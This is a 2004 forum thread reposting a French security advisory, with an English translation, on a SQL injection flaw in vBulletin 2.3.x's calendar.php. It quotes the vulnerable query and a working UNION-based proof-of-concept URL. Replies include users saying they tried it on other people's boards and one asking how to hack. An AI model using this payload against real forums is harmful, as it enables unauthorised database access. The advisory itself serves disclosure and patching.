Forums: Vbulletin "calendar.php" Sql Injection Vulnerabili - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Vbulletin "calendar.php" Sql Injection Vulnerabili from K-OTIK

#1 Guest_Nurgle_*

  • Group: Guests

Posted 08 January 2004 - 09:54 AM

[QUOTE]
Date de Publication: 2004-01-07 © K-OTik.COM
Titre: vBulletin 2.3.x "calendar.php" SQL Injection Vulnerability
K-Otik ID : 0481
Risque : Elevé
Exploitable à distance : Oui
Exploitable en local : Oui


* Description Technique - Exploit *

Une vulnérabilité a été identifiée dans le célèbre forum php vBulletin. Le probleme est de type SQL Injection, il se situe dans la variable "eventid" présente dans le fichier "calendar.php".

------------------------ line 585 in calendar.php ---------------------------------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
WHERE eventid = $eventid");
-------------------------------------------------------------------------------------

---------------------------- Proof of Concept -------------------------------------
calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate
-------------------------------------------------------------------------------------


* Versions Vulnérables *

vBulletin version v2.3.3 et inférieures.


* Solution *

Utiliser vBulletin version 2.3.4.
http://www.vbulletin.com


* Crédit *

Vulnérabilité découverte par Qianwei Hu (Janvier 2004)




Its french sorry
0

#2 User is offline   Kynroxes 

  • Staff Sergeant
  • Icon
  • Group: Members
  • Posts: 263
  • Joined: 20-October 03

Posted 08 January 2004 - 09:49 PM

Quote

/*
English Translation:
*/

Date of Publication: 2004-01-07 © K-OTik.COM
Title: vBulletin 2.3.x "calendar.php" SQL Injection Vulnerability
K-Otik ID : 0481
Risk : High
Remote : Yes
Local : Yes

* Technical Description - Exploit *

A vulnerability was identified in the famous forum php vBulletin. The problem is of type SQL Injection, it is in the variable "eventid" present in the file "calendar.php".

------------------------ line 585 in calendar.php ---------------------------------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
WHERE eventid = $eventid");
-------------------------------------------------------------------------------------

---------------------------- Proof of Concept -------------------------------------
calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate
-------------------------------------------------------------------------------------


* Vulnerable versions *

vBulletin version v2.3.3 and lower.


* Solution *

To use vBulletin version 2.3.4.
http://www.vbulletin.com


* Credit *

Vulnerability discovered by Qianwei Hu (January 2004).

0

#3 User is offline   zero-maitimax 

  • Sergeant First Class
  • Icon
  • Group: Members
  • Posts: 309
  • Joined: 16-December 03

Posted 12 January 2004 - 02:06 AM

a stupid question (i don't know nothing about forum's)

but how do i see what version it's using?
0

#4 User is offline   clip 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 139
  • Joined: 13-September 03

Posted 12 January 2004 - 06:44 AM

on the bottom on every page.

Quote

< Contact Us - *  >

Powered by: vBulletin Version 2.2.5
Copyright ©2000, 2001, Jelsoft Enterprises Limited.

0

#5 User is offline   zero-maitimax 

  • Sergeant First Class
  • Icon
  • Group: Members
  • Posts: 309
  • Joined: 16-December 03

Posted 13 January 2004 - 01:09 AM

oke tnx now i know :D
0

#6 User is offline   isaiah 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 199
  • Joined: 12-August 03

Posted 14 January 2004 - 01:22 AM

i tried it and still cant get to work
0

#7 User is offline   DrDoc 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 44
  • Joined: 30-November 03

Posted 14 January 2004 - 02:57 AM

Arrgg.. now i have to fix my board :\ :) thx 4 nfo.. i will tested before i secure it.. °°

Cya Doc
0

#8 User is offline   The Storm 

  • Sergeant
  • Icon
  • Group: Members
  • Posts: 200
  • Joined: 25-December 03

Posted 14 January 2004 - 04:50 AM

but how to hack does anybody know an exploit or sth else?
0

#9 Guest_dreedz_*

  • Group: Guests

Posted 14 January 2004 - 09:25 AM

Tried it on a couple of different boards, didn't work very well though.
0

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting